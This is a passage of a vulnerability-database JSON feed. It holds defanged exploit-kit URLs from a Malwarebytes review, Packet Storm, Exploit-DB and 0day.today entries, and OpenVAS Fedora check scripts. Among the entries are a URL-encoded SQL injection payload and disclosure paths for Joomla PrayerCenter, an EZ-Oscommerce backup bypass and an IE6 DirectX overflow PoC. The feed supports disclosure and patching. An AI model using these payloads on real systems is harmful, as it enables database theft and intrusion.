hxxp[://]212[.]109[.]198[.]22/?NDA5MTgw&BXhmtpFbq&rQLwisIbKvO=constitution&yMpSuTkuRhu=known&EPxLjfEgMobx=perpetual&nxAaNt=strategy&VKoMoenBvZEBoJ=already&t4gfhtgf4=8vUoeLNQPQXihEHRLw1mn4ZUUlpB86umi0aAyUDOgZHU-xTbUQ5G_5qcFoF4nwvF&ffffghds=wXbQMvXcJwDQA4bGMvrESLtMNknQA0KK2Ij2_dqyEoH9fGnihNzUSkr76B2aCm3Z&EuhiAT=strategy&IIwiBsrVTzN=community<SPgukgZMu=golfer&WHJVKfgHYyhBKA=already&ruFaROBjfxdFlTw=referred&erHmTrM=community&rZYXaPLBZQZ=constitution&alUaYovES=referred&PAmrMcgpepI=golfer&kWSrADlsss=professional&xftTftqdNDIyNjk0 \n hxxp[://]212[.]109[.]198[.]22/?NjMxNjg5&VhOoAwzH&BQMlhROymiqqMuw=blackmail&GhAssHkhgxqw=community&DegGfd=perpetual&gquWWCtuJtSPU=known&rAGXUesC=perpetual&zLRRtbwijFH=heartfelt&CIklccbXNmonSm=detonator&gaxgBSvwPv=heartfelt&sHkEPhjzv=constitution&EKoVAfMMJrfDqut=community&YDYZAvpVWZjDdO=blackmail&QRRmDFtTZ=blackmail&ffffghds=w3bQMvXcJxfQFYbGMv3DSKNbNkfWHViPxoeG9MildZmqZGX_k7rDfF-qoVvcCgWRxfUlKr&yuImXnAAw=professional&CFnDimnJDGPFi=wrapped&t4gfhtgf4=cFPArhjUODfwIwyIZaUV0b96n8ikbXwRPJgJ_UrxSLNwJEqaKcHbYy0VT8xrkdQJZnxBCy&NrzaCYKBrsfbC=golfer&WYYKaQVuhFBMjM2MDg4\n\n**GrandSoft EK**\n \n \n hxxp[://]pas[.]oxide[.]pimmar[.]fun/chihuahua-posting[.]php \n hxxp[://]pas[.]oxide[.]pimmar[.]fun/getversoinpd/1/2/3/4 \n hxxp[://]pas[.]oxide[.]pimmar[.]fun/9/110546\n\n**Underminer EK**\n \n \n hxxp[://]67[.]198[.]185[.]101/XKIOEEEEE[.]KDJDD[.]php \n hxxp[://]67[.]198[.]185[.]100/1Hqmyt597XO0ZNj9tXit7HZOMroEJu8c[.]php \n hxxp[://]38[.]75[.]137[.]9:9088/index[.]php?ad_id=I27cHv2i8QxDkXOJWhnMGw&re=I27cHv2i8QxDkXOJWhnMGw&rt=I27cHv2i8QxDkXOJWhnMGw&id=9088&zone=I27cHv2i8QxDkXOJWhnMGw&prod=I27cHv2i8QxDkXOJWhnMGw&lp=Type&st=I27cHv2i8QxDkXOJWhnMGw&e=1563981076&y=203384173015 \n hxxp[://]38[.]75[.]137[.]9:9088/js/e1cuqrhmik66gu7pr90qk9v3p8[.]js \n hxxp[://]38[.]75[.]137[.]9:9088/pubs/servlet[.]php?fp=39fe6ccb473b08362ae067b8c0ee865d&lang=en-US&token=&id=49457&sign=5eed006ae06584a03f969b9cd3558c28&validate=13b96b0bb8ac2a105d07f7c8b701f240 \n hxxp[://]38[.]75[.]137[.]9:9088/views/31ftap0qcljocims1ubickgps8[.]html \n hxxp[://]38[.]75[.]137[.]9:9088/logo[.]swf \n hxxp[://]38[.]75[.]137[.]9:9088/static/encrypt[.]min[.]js \n hxxp[://]38[.]75[.]137[.]9:9088/static/tinyjs[.]min[.]js \n hxxp[://]38[.]75[.]137[.]9:9088/js/ftp22vfljscml2370rsritui9g[.]js \n hxxp[://]38[.]75[.]137[.]9:9088/views/dlke6si3fr3spi30btq624ghlg[.]html \n hxxp[://]38[.]75[.]137[.]9:9088/pubs/article[.]php?id=471b68c405614637d03b31b4d3155244 \n hxxp[://]38[.]75[.]137[.]9:9088/views/ul2tuocpr2isi9pperindatp3c[.]ocx[.]gz \n hxxp[://]38[.]75[.]137[.]9:9088/views/m7sg0k3fcvrdre8psojjlu8r2c[.]txt \n hxxp[://]38[.]75[.]137[.]9:9088/views/a9pf63bef3ujd1u7r6v9dda0mk[.]wav \n hxxp[://]38[.]75[.]137[.]9:9088/pubs/wiki[.]php?id=91f093921cbb802ee2d2a22d8a4a1135\n\n**GreenFlash Sundown EK**\n \n \n hxxps[://]fastimage[.]site/act_image[.]html \n hxxps[://]fastimage[.]site/act_image[.]html?mercy=FdMzpfikLihAnNPppGIucrCHLfiIPE0UYY9ocxDP7RzUlUu6%2BcEavY5yGiQn8ogYce3E0sgs06B1y9%2BnxZhQCg%3D%3D&liberty=djji1ghk3gtx&bubble=RUDOpbnkAS1xQHVxflacRzfZxQ%3D%3D \n hxxps[://]fastimage[.]site/uptime[.]js \n hxxp[://]adsfast[.]site/crossdomain[.]xml \n hxxp[://]adsfast[.]site/index[.]php \n hxxp[://]accomplishedsettings[.]cdn-cloud[.]club/crossdomain[.]xml \n hxxp[://]accomplishedsettings[.]cdn-cloud[.]club/index[.]php \n hxxp[://]accomplishedsettings[.]cdn-cloud[.]club/index[.]php \n hxxp[://]accomplishedsettings[.]cdn-cloud[.]club/index[.]php?58f3d135=AwNt6IfxFIvMI5IVpwl86cW8Vw67HxZLI%2BxIxOVtVcp5LRaaMtmhuElGqOGKWUki92GcJmgL0gwOElyFUkW%2FzdQ1y8Ov8MxNATzL7HlkXp5%2FtFmbrh3TWgiJ1QvTmcEwbx66CaLWd2ekFpng2ky4fKUtGRibaY8Eyjcio3ZyibnhUVlW5CpiWNiz02jHD41t%2F9NDPteWGIO1ysm2%2B4%2Bu9osgKIW1%2BmGxVxMGaRby3g%2FBaqw%3D \n hxxp[://]accomplishedsettings[.]cdn-cloud[.]club/index[.]php?58f3d135=AwNt6IfxFIvMI5IVpwl86cW8Vw67HxZLI%2BxIxOVtVcp5LRaaMtmhuElGqOGKWUki92GcJmgL0gwOElyFUkW%2FzdQ1y8Ov8MxNATzL7HlkXp5%2FtFmbrh3TWgiJ1QvTmcEwbx66CaLWd2ekFpng2ky4fKUtGRibaY8Eyjcio3ZyibnhUVlW5CpiWNiz02jHD41t%2F9NDPteWGIO1ysu3%2Fo%2Bt9IsgKIW1%2BmGxVxMGaRby3g%2FBaqw%3D\n\nThe post [Exploit kits: summer 2019 review](<https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-07-30T16:20:33", "published": "2019-07-30T16:20:33", "id": "MALWAREBYTES:CA0A032ADCA72FCB979CB83795FC527B", "href": "https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/", "type": "malwarebytes", "title": "Exploit kits: summer 2019 review", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2019-02-14T18:54:18", "bulletinFamily": "exploit", "description": "", "modified": "2019-02-14T00:00:00", "published": "2019-02-14T00:00:00", "id": "PACKETSTORM:151671", "href": "https://packetstormsecurity.com/files/151671/Joomla-PrayerCenter-3.0.4-Database-Disclosure-SQL-Injection.html", "title": "Joomla PrayerCenter 3.0.4 Database Disclosure / SQL Injection", "type": "packetstorm", "sourceData": "`#################################################################### \n \n# Exploit Title : Joomla PrayerCenter 3.0.4 SQL Injection / Database Disclosure \n# Author [ Discovered By ] : KingSkrupellos \n# Team : Cyberizm Digital Security Army \n# Date : 14/02/2019 \n# Vendor Homepage : mlwebtechnologies.com/ \n# Software Download Link : github.com/MLWebTechnologies/PrayerCenter/releases \ngithub.com/MLWebTechnologies/PrayerCenter/archive/3.0.4.zip \ngithub.com/MLWebTechnologies/PrayerCenter/archive/3.0.3.zip \ngithub.com/MLWebTechnologies/PrayerCenter/archive/3.0.2.zip \ngithub.com/MLWebTechnologies/PrayerCenter/archive/3.0.1.zip \ngithub.com/MLWebTechnologies/PrayerCenter/archive/2.5.2.zip \n# Software Information Link : extensions.joomla.org/extensions/extension/living/religion/prayercenter/ \ngithub.com/MLWebTechnologies/PrayerCenter/releases \n# Software Affected Versions : 2.5.2 - 3.0.1 - 3.0.2 - 3.0.3 - 3.0.4 \n# Tested On : Windows and Linux \n# Category : WebApps \n# Exploit Risk : Medium \n# Google Dorks : inurl:''/index.php?option=com_prayercenter'' \n# Vulnerability Type : CWE-89 [ Improper Neutralization of \nSpecial Elements used in an SQL Command ('SQL Injection') ] \nCWE-200 [ Information Exposure ] \n# Old Similar CVE : CVE-2018-7314 \n# PacketStormSecurity : packetstormsecurity.com/files/authors/13968 \n# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ \n# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos \n \n#################################################################### \n \n# Description about Software : \n*************************** \nPrayerCenter 3.0.4 and 3.0.2 is now available for Joomla 3.x. \n \nThe PrayerCenter Component provides users of a website with the capability to \n \nshare their prayer concerns with others. Prayer concerns can be posted to the website, sent to \n \nmembers of the prayer chain, and sent to the Spiritual director or pastor. \n \nUsers can subscribe to be members of the prayer chain via online form. \n \n#################################################################### \n \n# Impact : \n*********** \n* Joomla PrayerCenter 3.0.4 and other versions - \n \ncomponent for Joomla is prone to an SQL-injection vulnerability because it \n \nfails to sufficiently sanitize user-supplied data before using it in an SQL query. \n \nExploiting this issue could allow an attacker to compromise the application, \n \naccess or modify data, or exploit latent vulnerabilities in the underlying database. \n \nA remote attacker can send a specially crafted request to the vulnerable application \n \nand execute arbitrary SQL commands in application`s database. \n \nFurther exploitation of this vulnerability may result in unauthorized data manipulation. \n \nAn attacker can exploit this issue using a browser. \n \n* This Software prone to an information exposure/database disclosure vulnerability. \n \nSuccessful exploits of this issue may allow an attacker to obtain sensitive \n \ninformation by downloading the full contents of the application's database. \n \n* Any remote user may download the database files and gain access \n \nto sensitive information including unencrypted authentication credentials. \n \n#################################################################### \n \n# SQL Injection Exploit : \n********************** \n/index.php?option=com_prayercenter&Itemid=[SQL Injection] \n \n/index.php?Itemid=[SQL Injection]&option=com_prayercenter \n \n/index.php?option=com_prayercenter&task=view&Itemid=[SQL Injection] \n \n/index.php?option=com_prayercenter&task=view_devotion&Itemid=[SQL Injection] \n \n/index.php?option=com_prayercenter&task=view&Itemid=[ID-NUMBER]&limitstart=[SQL Injection] \n \n/index.php?option=com_prayercenter&task=confirm&id=[ID-NUMBER]&sessionid=[SQL Injection] \n \n# Database Disclosure Exploit : \n******************************* \n/admin/sql/install.mysql.utf8.sql \n \n/admin/sql/uninstall.mysql.utf8.sql \n \n/administrator/components/com_prayercenter/install.mysql.utf8.sql \n \n/administrator/components/com_prayercenter/uninstall.mysql.utf8.sql \n \n#################################################################### \n \n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team \n \n#################################################################### \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/151671/joomlaprayercenter304-sqldisclose.txt"}, {"lastseen": "2018-02-24T00:58:02", "bulletinFamily": "exploit", "description": "", "modified": "2018-02-23T00:00:00", "published": "2018-02-23T00:00:00", "href": "https://packetstormsecurity.com/files/146547/Joomla-PrayerCenter-3.0.2-SQL-Injection.html", "id": "PACKETSTORM:146547", "type": "packetstorm", "title": "Joomla! PrayerCenter 3.0.2 SQL Injection", "sourceData": "`# # # # \n# Exploit Title: Joomla! Component PrayerCenter 3.0.2 - SQL Injection \n# Dork: N/A \n# Date: 22.02.2018 \n# Vendor Homepage: http://www.mlwebtechnologies.com/ \n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/prayercenter/ \n# Software Download: http://mlwebtechnologies.github.io/PrayerCenter/ \n# Software Download: https://github.com/MLWebTechnologies/PrayerCenter/releases/download/3.0.2/PrayerCenter302Unzip1st.zip \n# Version: 3.0.2 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-7314 \n# # # # \n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=[SQL] \n# \n# # # # \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/146547/joomlaprayercenter302-sql.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "joomla": [{"lastseen": "2018-09-18T08:40:47", "bulletinFamily": "software", "description": "PrayerCenter by Mike Leeper (MLWebTechnologies), versions 3.0.2 and previous,SQL Injection\n\nresolution: update to 3.0.3\n\nupdate notice: https://github.com/MLWebTechnologies/PrayerCenter\n", "modified": "2018-03-30T13:11:19", "published": "2018-03-06T00:00:00", "id": "JVEL:591", "href": "https://vel.joomla.org/vel-blog/2117", "type": "joomla", "title": "PrayerCenter,3.0.2,SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2019-05-29T18:20:29", "bulletinFamily": "NVD", "description": "SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.", "modified": "2018-03-06T13:58:00", "id": "CVE-2018-7314", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7314", "published": "2018-02-22T19:29:00", "title": "CVE-2018-7314", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-02-22T21:20:29", "bulletinFamily": "exploit", "description": "Joomla! Component PrayerCenter 3.0.2 - 'sessionid' SQL Injection. CVE-2018-7314. Webapps exploit for PHP platform", "modified": "2018-02-22T00:00:00", "published": "2018-02-22T00:00:00", "id": "EDB-ID:44160", "href": "https://www.exploit-db.com/exploits/44160/", "type": "exploitdb", "title": "Joomla! Component PrayerCenter 3.0.2 - 'sessionid' SQL Injection", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component PrayerCenter 3.0.2 - SQL Injection\r\n# Dork: N/A\r\n# Date: 22.02.2018\r\n# Vendor Homepage: http://www.mlwebtechnologies.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/prayercenter/\r\n# Software Download: http://mlwebtechnologies.github.io/PrayerCenter/\r\n# Software Download: https://github.com/MLWebTechnologies/PrayerCenter/releases/download/3.0.2/PrayerCenter302Unzip1st.zip\r\n# Version: 3.0.2\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-7314\r\n# # # #\r\n# Exploit Author: Ihsan Sencan\r\n# # # #\r\n# \r\n# POC: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=[SQL]\r\n# \r\n# %31%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69\r\n# \r\n# # # #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44160/"}], "zdt": [{"lastseen": "2018-04-08T05:43:31", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-02-22T00:00:00", "published": "2018-02-22T00:00:00", "href": "https://0day.today/exploit/description/29866", "id": "1337DAY-ID-29866", "title": "Joomla PrayerCenter 3.0.2 Component - sessionid SQL Injection Vulnerability", "type": "zdt", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component PrayerCenter 3.0.2 - SQL Injection\r\n# Vendor Homepage: http://www.mlwebtechnologies.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/prayercenter/\r\n# Software Download: http://mlwebtechnologies.github.io/PrayerCenter/\r\n# Software Download: https://github.com/MLWebTechnologies/PrayerCenter/releases/download/3.0.2/PrayerCenter302Unzip1st.zip\r\n# Version: 3.0.2\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-7314\r\n# # # #\r\n# Exploit Author: Ihsan Sencan\r\n# # # #\r\n# \r\n# POC: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=[SQL]\r\n# \r\n# %31%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69\r\n# \r\n# # # #\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29866"}, {"lastseen": "2018-04-03T15:27:30", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-07-20T00:00:00", "published": "2010-07-20T00:00:00", "id": "1337DAY-ID-13411", "href": "https://0day.today/exploit/description/13411", "type": "zdt", "title": "EZ-Oscommerce 3.1 by Pass / Creat and Download Backup Vulnerability", "sourceData": "===================================================================\r\nEZ-Oscommerce 3.1 by Pass / Creat and Download Backup Vulnerability\r\n===================================================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ####################################### 1\r\n0 I'm indoushka member from Inj3ct0r Team 1\r\n1 ####################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n######################################################################## \r\n\r\n# Vendor: http://www.ezosc.com\r\n\r\n# Date: 2010-05-27 \r\n\r\n# Author : indoushka \r\n\r\n# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! \r\n\r\n# Contact : [email\u00a0protected] \r\n\r\n# Home : www.arab-blackhat.co.cc\r\n\r\n# Dork :Powered by osCommerce | Customized by EZ-Oscommerce\r\n\r\n# Bug : Backup Vulnerability \r\n\r\n# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) \r\n######################################################################## \r\n \r\n# Exploit By indoushka \r\n\r\n\r\nhttp://127.0.0.1/ezosc/admin/backup/login.php?action=backupnow\r\n\r\nhttp://127.0.0.1/ezosc/admin/backup/login.php?action=backup\r\n\r\nto download buckup : http://127.0.0.1/ezosc/admin/backup/login.php?action=download&file=db_comm-20100301222138.sql\r\n\r\ndb_comm-20100301222138.sql chang it to the name of the backup and you cant download it with IE i download it with opera 10.10 + Mozilla Firefox\r\n\r\nDz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================\r\nall my friend :\r\nHis0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N\r\n(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ * ViRuS_Ra3cH\r\n---------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13411"}, {"lastseen": "2018-02-15T19:13:27", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category dos / poc", "modified": "2007-07-31T00:00:00", "published": "2007-07-31T00:00:00", "id": "1337DAY-ID-6429", "href": "https://0day.today/exploit/description/6429", "type": "zdt", "title": "MS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit", "sourceData": "================================================================\r\nMS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit\r\n================================================================\r\n\r\n\r\n\r\n\r\n<!--============================================================================\r\ndxtmsft.dll Remote Buffer Overflow Exploit\r\nInternet Explorer ver 6.0\r\nDeltahackingSecurityTEAM\r\nBug discovered by Dr.Pantagon\r\nAffected Software: dxtmsft.dll (DirectX Media -- Image DirectX Transforms)\r\nDLL VER : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)\r\nCompany Dll : Microsoft? Windows? Operating System\r\npath : C:\\WINDOWS\\system32\\dxtmsft.dll\r\nall software that use this ocx are vulnerable to this exploits.\r\nwww.Deltahacking.net\r\nwww.Deltasecurity.ir\r\n==============================================================================-->\r\n\r\n<object classid=\"clsid:421516C1-3CF8-11D2-952A-00C04FA34F05\" id=\"Chroma\"></object>\r\n\r\n<input language=VBScript onclick=jojo() type=button value=\"Click here to start Exploit\"><script language='vbscript'>\r\n Sub jojo\r\n buff = String(999999, \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaA\")\r\n\r\n get_EDX = \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbcccccccccccccddddddddddeee\"\r\n\r\n buff1 = String(999999, \"BBBBBBBBBBBBBBBBBBBBBBBBBBBBbb\")\r\n\r\n egg = buff + get_EDX + buff1 + scode\r\n\r\n Chroma.Color = egg\r\n End Sub\r\n</script>\r\n\r\n\r\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6429"}], "openvas": [{"lastseen": "2017-07-25T10:55:19", "bulletinFamily": "scanner", "description": "Check for the Version of systemtap", "modified": "2017-07-10T00:00:00", "published": "2011-06-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=863106", "id": "OPENVAS:863106", "title": "Fedora Update for systemtap FEDORA-2011-7289", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for systemtap FEDORA-2011-7289\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"systemtap on Fedora 13\";\ntag_insight = \"SystemTap is an instrumentation system for systems running Linux 2.6.\n Developers can write instrumentation to collect data on the operation\n of the system.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-May/060810.html\");\n script_id(863106);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-7289\");\n script_cve_id(\"CVE-2011-1781\", \"CVE-2011-1769\", \"CVE-2010-4170\", \"CVE-2010-4171\");\n script_name(\"Fedora Update for systemtap FEDORA-2011-7289\");\n\n script_summary(\"Check for the Version of systemtap\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"systemtap\", rpm:\"systemtap~1.4~6.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:28", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-06-03T00:00:00", "id": "OPENVAS:1361412562310863107", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863107", "title": "Fedora Update for systemtap FEDORA-2011-7302", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for systemtap FEDORA-2011-7302\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-May/060790.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863107\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-03 09:20:26 +0200 (Fri, 03 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-7302\");\n script_cve_id(\"CVE-2011-1781\", \"CVE-2011-1769\", \"CVE-2010-4170\", \"CVE-2010-4171\");\n script_name(\"Fedora Update for systemtap FEDORA-2011-7302\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'systemtap'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"systemtap on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n 